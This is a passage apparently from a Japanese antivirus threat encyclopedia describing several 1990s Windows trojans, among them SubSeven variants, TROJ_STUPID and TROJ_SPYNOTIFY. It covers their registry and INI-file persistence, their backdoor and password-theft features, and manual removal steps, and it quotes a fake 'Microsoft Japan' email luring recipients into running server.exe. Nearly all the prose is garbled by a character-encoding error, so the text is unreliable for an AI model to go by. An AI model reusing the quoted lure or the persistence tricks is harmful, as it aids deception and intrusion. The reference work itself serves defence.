MODE¤Çµ¯Æ°¤¹¤ë¤Ê¤É¤· ¤Æ ¡ÖWSOCK32.DLL¡×¤¬»ÈÍÑÃæ¤Ç¤Ï¤Ê¤¤¾õÂ֤ˤ·¤Æ¤«¤éºï½ü¤·¤Æ ¤¯¤À¤µ¤¤¡£ ­¢¡ÖWSOCK32.SKA¡× ¤ò ¡ÖWSOCK32.DLL¡×¤Ë¥ê¥Í¡¼¥à¤¹¤ëŽ¡ *¡ÖWSOCK32.SKA¡×¤ÏWindows¤ÎSystem¥Õ¥©¥ë¥À¡Ê"\Windows\ System"¡Ë¤Ë¸ºß¤·¤Æ¤¤¤Þ¤¹¡£ °Ê¾å

TROJ_SKA.WSOCK32


̾¡¡¡¡¾Î:TROJ_SKA.WSOCK32

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN 32bit(WIN95/98)

¥¦¥¤¥ë¥¹¥µ¥¤¥º:66560bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏTROJ_SKA¤Ë¤è¤Ã¤Æ²þÊѤµ¤ì¤¿WSOCK32.DLL
¤ò¸¡½Ð¤¹¤ëºÝ¤Î¸¡½Ð̾¤Ç¤¹¡£¤³¤Î̾¾Î¤ÇWSOCK32.DLL¤¬¸¡½Ð ¤µ¤ì¤¿¥Þ¥·¥ó¤Ï¡¢TROJ_SKA¤Ë´¶À÷¤·¤Æ¤¤¤Þ¤¹¡£¾Ü¤·¤¤¶î½ü ÊýË¡¤ÏTROJ_SKA¤Î¾ðÊó¤ò¤´Í÷¤¯¤À¤µ¤¤¡£

TROJ_SPYNOTIFY


̾¡¡¡¡¾Î:TROJ_SPYNOTIFY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WINDOWS 32bit

¥¦¥¤¥ë¥¹¥µ¥¤¥º:23,552 bytes

¾Ü¡¡¡¡ºÙ:- ¤³¤ì¤ÏޤTROJ_NETSPY ¤Î¥×¥é¥°¥¤¥ó¤È¤·¤Æ³«È¯
¤µ¤ì¤¿¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡ - NETSPY¤È¤Ïޤ¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤Æ¥Þ¥·¥ó¤ò¥ê¥â¡¼¥È¥³¥ó ¥È¥í¡¼¥ë¤¹¤ë¤¿¤á¤Î¥µ¡¼¥Ð¡¼Ž¥¥¯¥é¥¤¥¢¥ó¥È·¿¥×¥í¥°¥é¥à¤Ç ¤¢¤ëŽ¡ÉÔÀµ¿¯Æþ¤ò¿Þ¤ë¹¶·â¼Ô¤Ïޤ¥æ¡¼¥¶¡¼¤Ë¤½¤ì¤ÈÃΤ餺¤Ë NETSPY¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤ò¥¤¥ó¥¹¥È¡¼¥ë¤µ¤»Ž¤¥¯¥é¥¤¥¢¥ó ¥È¥×¥í¥°¥é¥à¤«¤é¾¡¼ê¤Ë¥æ¡¼¥¶¡¼¥Þ¥·¥ó¤ò¥³¥ó¥È¥í¡¼¥ë¤¹ ¤ëŽ¡ - TROJ_SPYNOTIFY¤ÏޤNETSPY¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬¤¹¤Ç¤Ëư ºî¤·¤Æ¤¤¤ë¡Éµ¾À·¼Ô¡É¤Î¥Þ¥·¥ó¤¬¥Í¥Ã¥È¥ï¡¼¥¯¤ËÀܳ¤·¤Æ ¤¤¤ë¤«¤É¤¦¤«¤ò¾ï»þ´Æ»ë¤·Ž¤IP¥¢¥É¥ì¥¹¤ò¹¶·â¼Ô¤ËÁ÷¿®¤¹¤ë Ìò³ä¤ò²Ì¤¿¤¹Ž¡

TROJ_STUPID


̾¡¡¡¡¾Î:TROJ_STUPID

ÊÌ¡¡¡¡Ì¾:TROJ_W95_STUPID

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:¥Þ¥ì¡¼¥·¥¢

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤Èޤ¼«Ê¬¼«¿È¤ÎÊ£
À½¥Õ¥¡¥¤¥ë¤òHDD¤Î¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤ËÃÖ¤¯Ž¡¤³¤Î¤È¤­Ž¤" Dat0.exe"¤È"Smile.exe"¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤ò ºî¤ëŽ¡¤µ¤é¤Ë¥ì¥¸¥¹¥È¥ê¤ËÅÐÏ¿¤·Ž¤¥Þ¥·¥óµ¯Æ°»þ¤Ëɬ¤º¼Â¹Ô ¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ëŽ¡ -¡¡"Dat0.exe¤¬¼Â¹Ô¤µ¤ì¤ë¤Èޤ
´¶À÷ÊýË¡:
-¡¡¤³¤Î¥×¥í¥°¥é¥à¤Ï¾¤Î¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤Ž¡ ¤·¤«¤·Ž¤¼Â¹Ô»þ¤Ë¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤¬Æþ¤Ã¤Æ¤¤¤ë¤ÈޤSYS A
:¤ò»È¤Ã¤Æ¤½¤Î¥Õ¥í¥Ã¥Ô¡¼¤òµ¯Æ°²Äǽ¤Ê¥Ç¥£¥¹¥¯¤Ë
¤·¤ÆŽ¤"autoexec.bat"ޤ "pth.bat"ޤ "s.bat"ޤ"smile.exe"¤Î 4¤Ä¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ëŽ¡¤³¤Î¥Õ¥í¥Ã¥Ô¡¼¤Ç¾¤Î¥Þ¥·¥ó¤ò µ¯Æ°¤¹¤ëŽ¡¤ë¤ÈޤTROJ_STUPID¤¬¼«Æ°Åª¤Ë¼«Ê¬¤ÎÊ£À½¤ò¤½¤Î¥Þ ¥·¥ó¤ÎHDD¤ËºîÀ®¤¹¤ëŽ¡
»³²:
-¡¡¥ì¥¸¥¹¥È¥ê¤ò²þÊѤ·Ž¤¥Þ¥·¥ó¤Îµ¯Æ°»þ¤ËËè²ó"Dat0.exe" ¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ëŽ¡ -¡¡¤³¤Î"Dat0.exe"¤Ïޤµ¯Æ°²ÄǽFD¤òºîÀ®¤¹¤ëŽ¡
´¶À÷Ãû¸õ:
-¡¡¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤Ë°Ê²¼¤ÎÆó¤Ä¤Î¥Õ¥¡¥¤¥ë¤¬¤¢¤ëŽ¡ "Dat0.exe" "Smile.exe" _ -¡¡¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\ CURRENTVERSION\RUN¤Ë"Dat0.exe"¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ëŽ¡
¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾:STUPID.EXE

È÷¡¡¡¡¹Í:¤³¤Î¥¦¥¤¥ë¥¹¤ÏޤAnxiety poppy¥¦¥¤¥ë¥¹¤òºî¤Ã
¤¿"VicodinES"¤¬Ž¤VisualBasic5¤ò»ÈÍѤ·¤ÆºîÀ®¤·¤¿¤â¤Î¤Ç ¤¢¤ëŽ¡¤³¤Î¥¦¥¤¥ë¥¹¤¬Àµ¾ï¤Ë¼Â ¹Ô¤µ¤ì¤ë¤Ë¤ÏޤMSVBVM50.DLL¤¬É¬ÍפǤ¢¤ëŽ¡

TROJ_SUBSEVEN.21


̾¡¡¡¡¾Î:TROJ_SUBSEVEN.21

ÊÌ¡¡¡¡Ì¾:¡¡¡¡

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:380,835 bytes

¾Ü¡¡¡¡ºÙ:¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥È¥í¥¤
¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ¥à¤Ë ´¶À÷¤¹¤ë¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿ ¥³¥ó¥Ô¥å¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥¯¥é ¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¹¶·â¼Ô¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤ò±ó ³ÖÀ©¸æ¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ê¤Þ¤¹¡£ ¡¡¼Â¹Ô¤µ¤ì¤ë¤ÈPKZIP¤ÎCRC¥¨¥é¡¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤·¡¢ ¼«Ê¬¼«¿È¤Î¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ¤¹¡£É½Ì̾å¤Ï²¿»ö¤â¤Ê¤¯½ª
λ¤·¤¿¤è¤¦¤Ë¸«¤¨¤Þ¤¹¤¬¡¢Î¢¤Ç¤ÏC:\Windows¥Õ¥©¥ë¥À¤Ë
MSREXE.EXE¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾¤Ç¼«Ê¬¤Î¥³¥Ô¡¼¤òºîÀ®¤·¡¢ WIN.INI¤È¥ì¥¸¥¹¥È¥ê¤ËMSREXE.EXE¤Î¼«Æ°µ¯Æ°¤ÎÀßÄê¤ò¹Ô¤¤
¤Þ¤¹¡£¶ñÂÎŪ¤ÊÀßÄê¤Ï°Ê²¼¤ÎÄ̤ê¤Ç¤¹:

WIN.INI:
¡Îwindows¡Ï¥»¥¯¥·¥ç¥óÆâ¤Î"run="¤Ë"msrexe.exe"¤Î µ­½Ò¤òÄɲä·¤Þ¤¹¡£
¥ì¥¸¥¹¥È¥ê:
¡¡HKEY_LOCAL_MACHINES\Software\ Microsoft\Windows\CurrentVersion\Run¡¡¤Ë¡¡msrexe=" msrexex.exe" µÚ¤Ó¡¢ ¡¡HKEY_LOCAL_MACHINES\Software\ Microsoft\Windows\CurrentVersion\RunServices¡¡¤Ë¡¡ msrexe="msrexex.exe" ¤ÎÀßÄê¤òÄɲä·¤Þ¤¹¡£ ¡¡¤¤¤¯¤Ä¤«¤Î°¡¼ï¤¬¤¢¤ê¡¢°¡¼ï¤Ë¤è¤Ã¤Æ¤Ï¾åµ­¤ÎÀßÄê¤Î¤¦ ¤Á¤É¤ì¤«¤Î¤ß¤ò¹Ô¤¦¤â¤Î¤â¤¢¤ê¤Þ¤¹¡£ ¡¡TROJ_SUBSEVEN.21¤ÏTROJ_SUBSEVEN.S¤ò²þÎɤ·¤¿ ¿µ¡Ç½¤Î¥Ï¥Ã¥«¡¼¥Ä¡¼¥ë¤Ç´ðËÜŪ¤Êµ¡Ç½¤ÏTROJ_SUBSEVEN.S ¤Ë½à¤¸¤Þ¤¹¤¬¡¢±ó³ÖÀ©¸æ¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¡¼¾å¤Ç²èÌ̤òµÕ ¤µ¤Þ¤Ëɽ¼¨¤µ¤»¤¿¤ê¥Ç¥¹¥¯¥È¥Ã¥×¤ÎÀßÄê¤òÊѹ¹¤·¤Æ¤·¤Þ¤¦ ¤³¤È¤â¤Ç¤­¤Þ¤¹¡£¤Þ¤¿¡¢AOL¤äICQ¤Î¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à¤³¤È ¤â²Äǽ¤Ç¤¹¡£ ¡¡¤½¤Î¾¡¢TROJ_SUBSEVEN.21¤Ç¿·¤·¤¯Äɲ䵤줿µ¡
ǽ¤Ï°Ê²¼¤Î¤È¤ª¤ê¤Ç¤¹:
£±¡Ë¤³¤ì¤Þ¤Ç¤Ë¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤ÎIP¤ËPING¥³¥Þ¥ó¥É ¤òÁ÷¿®¤·¡¢¼«Ê¬¤¬¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤ÎÄÉÀפ¬¹Ô¤¨¤Þ ¤¹¡£ £²¡Ë¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤ÎWindowsCD¥­¡¼¤ò¼èÆÀ¤Ç¤­¤Þ ¤¹¡£ £³¡Ë¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤ÎICQ¤ÎUIN¡ÊICQ¾å¤ÎÅÐÏ¿ÈÖ¹æ¡Ë ¤ò¼èÆÀ¤Ç¤­¤Þ¤¹¡£ £´¡Ë¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤Ë"TrueVoice(ʸ½ñȯÀ¼¥¢¥×¥ê¥± ¡¼¥·¥ç¥ó)"¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤¿¾ì¹ç¡¢¥Ï¥Ã¥«¡¼¤¬Æþ ÎϤ·¤¿Ê¸½ñ¤ò¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¾å¤ÇÆÉ¤ß¾å¤²¤µ¤»¤ë¤³ ¤È¤¬¤Ç¤­¤Þ¤¹¡£¤â¤·TrueVoice¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤Ê¤¯ ¤È¤â¥µ¡¼¥Ð¡¼¾å¤«¤éµ¡Ç½¥¢¥Ã¥×¥Ç¡¼¥È¤ò¹Ô¤¦µ¡Ç½¤òÍøÍѤ· ¤ÆTrueVoice¤ò¾¡¼ê¤Ë¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤Ë¥¤¥ó¥¹¥È¡¼¥ë ¤¹¤ë¤³¤È¤â²Äǽ¤Ç¤·¤¿¡£¸½ºß¤Ï´û¤Ë¤³¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë ÍѤΥµ¡¼¥Ð¡¼¤ÏÄä»ß¤·¤Æ¤¤¤Þ¤¹¡£ £µ¡Ë¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¤Î¥¯¥ê¥Ã¥×¥Ü¡¼¥Éµ¡Ç½¤òÁàºî¤¹ ¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¥Ï¥Ã¥­¥ó¥°¤·¤¿¥Þ¥·¥ó¾å¤Ç¥³¥Ô¡¼¤·¤¿ ʸ»úÎó¤òÅð¤ó¤À¤ê¡¢¥¯¥ê¥Ã¥×¥Ü¡¼¥É¤ÎÆâÍÆ¤òÊѹ¹¤·¤¿¤ê¡¢ ¥¯¥ê¥¢¤·¤Æ¤·¤Þ¤¦¤³¤È¤â¤Ç¤­¤Þ¤¹¡£ £¶¡Ë¥Ï¥Ã¥«¡¼¤ÎICQ¡¢IRC¡¢E-mail¤Ë¼«Æ°Åª¤ËÄÌÃΤò¹Ô¤¦Àß Ä꤬¤Ç¤­¤Þ¤¹¡£ £·¡ËIRC¥µ¡¼¥Ð¡¼¤ÎÀßÄê¤ÇIRC¥Ý¡¼¥È¤ä¥Ë¥Ã¥¯¥Í¡¼¥à¤ÎÅÐÏ¿ ¤¬¹Ô¤¨¤Þ¤¹¡£
È÷¡¡¡¡¹Í:¡¦¼êư¶î½ü¼ê½ç:
£±¡ËÉÔÀµ¥×¥í¥°¥é¥à¤Î¼«Æ°µ¯Æ°ÀßÄê¤òºï½ü¤·¤Þ¤¹¡£
WIN.INI:
¡Îwindows¡Ï¥»¥¯¥·¥ç¥óÆâ¤Î"run="¤Ë"msrexe.exe"¤Îµ­½Ò ¤òºï½ü¤·¤Þ¤¹¡£
¥ì¥¸¥¹¥È¥ê:
¡¡HKEY_LOCAL_MACHINES\Software\ Microsoft\Windows\CurrentVersion\Run¡¡¤Ë¡¡msrexe=" msrexex.exe" µÚ¤Ó¡¢ ¡¡HKEY_LOCAL_MACHINES\Software\ Microsoft\Windows\CurrentVersion\¤ÎRunServices¡¡¤Ë¡¡ msrexe="msrexex.exe" ¤ÎÀßÄê¤òºï½ü¤·¤Þ¤¹¡£ £²¡Ë¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¡¢Windows¥Ç¥£¥ì¥¯¥È¥êÆâ¤Îmsrexe. exe¤òºï½ü¤·¤Þ¤¹¡£ ¢¨ÇÛÉÛ¤µ¤ì¤¿¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾¤È¤·¤Æ¤Ï¸½ºß¤Î¤È¤³¤í 2young4me.exe¤¬³Îǧ¤µ¤ì¤Æ¤¤¤Þ¤¹¡£

TROJ_SUBSEVEN.S


̾¡¡¡¡¾Î:TROJ_SUBSEVEN.S

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN 32bit

¥¦¥¤¥ë¥¹¥µ¥¤¥º:336,867¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥È¥í¥¤
¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì ¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥¯ ¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¹¶·â¼Ô¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë ¥¢¥¯¥»¥¹¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ê¤Þ¤¹¡£ ¾¤Î¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£¥ª ¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾¤ÏServer.exe¤¬³Îǧ¤µ¤ì¤Æ¤¤¤Þ¤¹¡£¥Õ ¥¡¥¤¥ë̾¤ÏÊѹ¹¤·¤Æ¤âưºî¤·¤Þ¤¹¤Î¤Ç°ã¤¦¥Õ¥¡¥¤¥ë̾¤Ç¤â Ãí°Õ¤¬É¬ÍפǤ¹¡£ ¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¡Ö¥¤¥ó¥¹¥È¡¼¥ë´°Î»¡×¤È¤¤¤¦¥á ¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤Þ¤¹¡£¤³¤Î´Ö¤Ë¡¢¥È¥í¥¤¤ÎÌÚÇϤϡ¢¼« ʬ¼«¿È¤òWindows¥Ç¥£¥ì¥¯¥È¥ê¤ËKERNE1.EXE¤È¤¤¤¦¥Õ¥¡¥¤¥ë ̾¤Ç¥¤¥ó¥¹¥È¡¼¥ë¤·¤Þ¤¹¡£¤µ¤é¤Ë¡¢SYSTEM.INI¤Î[boot]¥» ¥¯¥·¥ç¥ó¤òÊѹ¹¤·¡¢°Ê²¼¤ÎÃͤòÉÕ¤±²Ã¤¨¤Þ¤¹¡£ [boot] shell = Explorer.exe Kerne1.exe ¤³¤ì¤Ë¤è¤Ã¤Æ¥Þ¥·¥ó¤Îµ¯Æ°»þ¤Ëɬ¤º¥È¥í¥¤¤ÎÌÚÇϤ¬¼Â¹Ô¤µ ¤ì¤ë¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£ »³² ¥â¥Ç¥à¤¬¤¢¤ë´Ä¶­¤Ç¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥¤¥ó¥¿ ¡¼¥Í¥Ã¥È¤ËÀܳ¤¹¤ë¤è¤¦¡¢¥À¥¤¥¢¥ë¥¢¥Ã¥×Àܳ¥×¥í¥°¥é¥à ¤¬µ¯Æ°¤µ¤ì¤Þ¤¹¡£¥Þ¥·¥ó¤¬¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤¹¤ë¤È¡¢ ¤³¤Î¥×¥í¥°¥é¥à¤Ï¡¢BackDoor¤Î¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤È¤·¤Æ µ¡Ç½¤·¤Þ¤¹¡£¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤ ¤ë¥Þ¥·¥ó¤Ï¡¢¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤òÍøÍѤ·¤¿±ó³ÖÁàºî ¤Ë¤è¤Ã¤Æ¡¢¥Ñ¥¹¥ï¡¼¥É¤Ê¤É¤Î¾ðÊó¤Î¼èÆÀ¤ä¡¢ICQ/IRC/E- Mail¤Ç¥á¥Ã¥»¡¼¥¸¤òÁ÷¿®¤¹¤ë¤Ê¤É¡¢¾¡¼ê¤Ë¥³¥ó¥È¥í¡¼¥ë¤µ ¤ì¤Æ¤·¤Þ¤¤¤Þ¤¹¡£
È÷¡¡¡¡¹Í:TROJ_SUBSEVEN.S ¤¬¡¢¥Þ¥¤¥¯¥í¥½¥Õ¥È¤«¤é¤Î¥á
¡¼¥ë¤Èµ¶¤Ã¤Æ¡¢²¼µ­¤Î¤è¤¦¤ÊÆüËܸì¤Î¥á¡¼¥ë¤ËźÉÕ¤µ¤ì¡¢ ¤Ð¤é¤Þ¤«¤ì¤Æ¤¤¤Þ¤¹¡£¤³¤Î¥á¡¼¥ë¤Ï¥Þ¥¤¥¯¥í¥½¥Õ¥È¼Ò¤Î̵ ÎÁÅŻҥ᡼¥ë"Hot Mail"¤Î¥¢¥«¥¦¥ó¥È¤«¤éÁ÷¿®¤µ¤ì¤Æ¤¤¤Þ ¤¹¡£°Ê²¼¤Î¤è¤¦¤Ê¥á¡¼¥ë¤Ç"Server.exe"¤È¤¤¤¦ÅºÉÕ¥Õ¥¡¥¤ ¥ë¤¬Á÷¤é¤ì¤ÆÍ褿¾ì¹ç¤Ï¡¢·è¤·¤Æ¼Â¹Ô¤·¤Ê¤¤¤Ç¤¯¤À¤µ¤¤¡£ ¥á¡¼¥ë¤´¤Èºï½ü¤¹¤ë¤³¤È¤ò¤ª´«¤á¤·¤Þ¤¹¡£ -----------------------------------------------------
·ï̾: ¥Þ¥¤¥¯¥í¥½¥Õ¥È¡¦¥¸¥ã¥Ñ¥ó¡¦¥µ¡¼¥Ó¥¹¤«¤é¤Î¤ªÃΤé
¤»¡Ê¶ÛµÞ¡Ë ¢£¢¢¢£¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¥Þ¥¤¥¯¥í¥½¥Õ¥È¡¦¥¸¥ã¥Ñ¥ó¡¦¥µ¡¼¥Ó¥¹¤«¤é ¤Î¤ªÃΤ餻¡Ê¶ÛµÞ¡Ë ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬£Î £å£÷£ó¨¬£°£¹¡¿£±£µ ¢£¢¢¢£ ÊÀ¼Ò¤Î¥¦¥£¥ó¥É¥¦¥ºOS¥·¥ê¡¼¥º¤ò¤ª»È¤¤¤¤¤¿¤À¤­¡¢¿¿¤Ë¤¢ ¤ê¤¬¤È¤¦¤´¤¶¤¤¤Þ¤¹¡£ ¤³¤Î¤¿¤Ó¡¢¤ªÃΤ餻¤·¤¿¤¤¤³¤È¤¬¤´¤¶¤¤¤Þ¤¹¤Î¤Ç¡¢¥á¡¼¥ë ¤Ç¼ºÎ餤¤¿¤·¤Þ¤·¤¿¡£ ¢§ ¢§¢§¤ªÃΤ餻¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬ £¹·î£µÆüÉդξðÊó¤Ë¤è¤ë¤È¡¢£±£¹£¹£´Ç¯¤Ë¥¤¥®¥ê¥¹¤Î¥í¥ó ¥É¥ó¤òÃæ¿´¤ËȯÀ¸¤·¤¿ ¥¦¥£¥ë¥¹¡ÖPinkworm¡×¤¬¡¢º£Ç¯¤Î£¸·îÃæ½Ü¤«¤é¥¢¥á¥ê¥«¤Ç ºÆÈ¯À¸¤·¤Æ¤¤¤ëÌÏÍÍ ¤Ç¤¹¡£¡¡¤³¤Î¥¦¥£¥ë¥¹¤Ï¡¢PCÆâ¤Ç¼«¸ÊÁý¿£¤·¡¢¤½¤ÎPC¤Îǽ ÎϤòÃø¤·¤¯Äã²¼¤µ ¤»¤ë¾É¾õ¤¬¤Ç¤Þ¤¹¡£¡¡£±£¹£¹£µÇ¯¤Ë¥Þ¥¤¥¯¥í¥½¥Õ¥È¤¬È¯Çä ¤·¤¿¡ÖWindows95¡×¤Î ´Ä¶­²¼¤Ç¤Ï¤³¤Î¥½¥Õ¥È¤Ï²Ôư¤·¤Ê¤«¤Ã¤¿¤Î¤Ç¤¹¤¬¡¢¡Ö Windows98¡×¤Î´Ä¶­²¼¤Ç¤Ï ¾É¾õ¤¬½Ð¤ëÎ㤬¤¢¤ê¤Þ¤¹¡£¡¡¤³¤ì¤Ï¤³¤Î¥¦¥£¥ë¥¹¼«ÂÎ¤Ë¤Ê ¤ó¤é¤«¤Î²þ¤¤¬»Ü¤µ¤ì ¤Æ¤¤¤ë¤«¤é¤Ç¤¹¡£¡¡Worm¥¦¥£¥ë¥¹¤Ï¡¢¥Í¥Ã¥È¥ï¡¼¥¯Àܳ¤µ ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¡¼´Ö ¤ò¼«¸ÊÊ£À½¤·¤Ê¤¬¤é°Üư¤¹¤ë¤¿¤á¡¢¹­¤¯´¶À÷¤·¤Æ¤·¤Þ¤¦²Ä ǽÀ­¤¬¤¢¤ë¤Î¤Ç¡¢Åö¼Ò¤Ç ¤Ï¤³¤Î¥¦¥£¥ë¥¹¤Î¥ï¥¯¥Á¥ó¡¦¥½¥Õ¥È¤òÇÛÉÛ¤¹¤ë¤³¤È¤ËÃפ· ¤Þ¤·¤¿¡£ ¢§ ¢§¢§¥ï¥¯¥Á¥ó¤Ë¤Ä¤¤¤Æ¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬ ¤³¤Î¥ï¥¯¥Á¥ó¤ÏͽËÉ·¿¥ï¥¯¥Á¥ó¤Ç¤¹¡£¡¡¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ì ¤Ð¡¢¥¦¥£¥ë¥¹¤Î¿ÊÆþ¤ò Ëɤ°µ¡Ç½¤¬¤Ä¤¤¤Æ¤¤¤Þ¤¹¡£¡¡Í½ËÉ·¿¥ï¥¯¥Á¥ó¤Ç¤¢¤ë¤¿¤á¡¢ ¥¦¥£¥ë¥¹¥¹¥­¥ã¥ó¡¦¥½ ¥Õ¥È¤Ç´¶ÃΤµ¤ì¤ë¤³¤È¤¬¤¢¤ê¤Þ¤¹¤¬¡¢ÌäÂꤢ¤ê¤Þ¤»¤ó¡£ ¢§ ¢§¢§¥¤¥ó¥¹¥È¡¼¥ëÊýË¡¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬ ¤³¤Î¥á¡¼¥ë¤ËÉÕ°¤·¤Æ¤¤¤ë¡Öserver.exe¡×¤È¤¤¤¦¥Õ¥¡¥¤¥ë ¤ò¥À¥Ö¥ë¥¯¥ê¥Ã¥¯¤¹¤ë ¤À¤±¤Ç¡¢¥¤¥ó¥¹¥È¡¼¥ë½ªÎ»¤Ç¤¹¡£ ¢§ ¢§¢§¤ª´ê¤¤¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬ ¤³¤Î¥á¡¼¥ë¤ËÉÕ°¤Î¥½¥Õ¥È¤ò¥¤¥ó¥¹¥È¡¼¥ë¸å¡¢ msjser@hotmail.com 